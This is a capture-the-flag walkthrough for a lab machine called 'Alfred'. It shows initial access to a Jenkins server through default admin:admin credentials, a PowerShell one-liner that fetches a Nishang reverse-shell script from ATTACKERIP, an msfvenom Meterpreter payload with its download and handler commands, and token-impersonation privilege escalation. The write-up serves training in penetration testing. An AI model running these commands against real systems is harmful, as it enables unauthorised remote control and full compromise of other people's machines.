Alfred

Initial Access:
1. Nmap Scan with nmap -T5 -sV ip reveals - 80,3389.8080 open where 80 has Microsoft IIS Server running and 8080 has Jetty 9.4.z snapshot and upon opening http://ip:8080 in browser we see it's a jenkin instance login page.
2. Login with default credentials admin:admin, Go to Project > configure >General > Build >Execute Batch Command
3. Nishang is collection of PS scripts used for enumeration, Windows PE, reverse shell etc., we will be using reverse shell script for this task , host the script using python http server in port 80.
4. Start netcat listener at port 1337 in attacker terminal, type powershell iex (New-Object Net.WebClient).DownloadString(‘http://ATTACKERIP:80/Shells/Invoke-PowerShellTcp.ps1’);Invoke-PowerShellTcp -Reverse -IPAddress ATTACKERIP -Port 1337 in textbox below Execute Batch Command , save and start build to get shell in netcat.
5. cd C:\Users\bruce\Desktop and type user.txt to obtain user flag.

Switching Shells:
1. Generate payload using msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=ATTACKERIP LPORT=ATTACKERPORT -f exe -o shell.exe
2. Download payload to victim using powershell "(New-Object System.Net.WebClient).Downloadfile('http://ATTACKERIP:80/Shells/shell.exe','shell.exe')".
3. Set up handler in metasploit to start listening , use exploit/multi/handler ,set PAYLOAD windows/meterpreter/reverse_tcp , set LHOST ATTACKERIP , set LPORT ATTACKERPORT & run
4. Start-Process shell.exe to get meterpreter shell
Privilege Escalation:
1. Run whoami /priv - SeDebugPrivilege, SeImpersonatePrivilege enabled
2. In meterpreter shell run load incognito to exploit this, list_tokens -g to list available tokens to impersonate , impersonate_token "BUILTIN\Administrators" to impersonate Admin token.
3. migrate pid - migrate to safe process like services.exe
4. Now run pwd - you will be inside C:\Windows\System32\ , cd config , cat root.txt to obtain root flag and submit !!!

results matching ""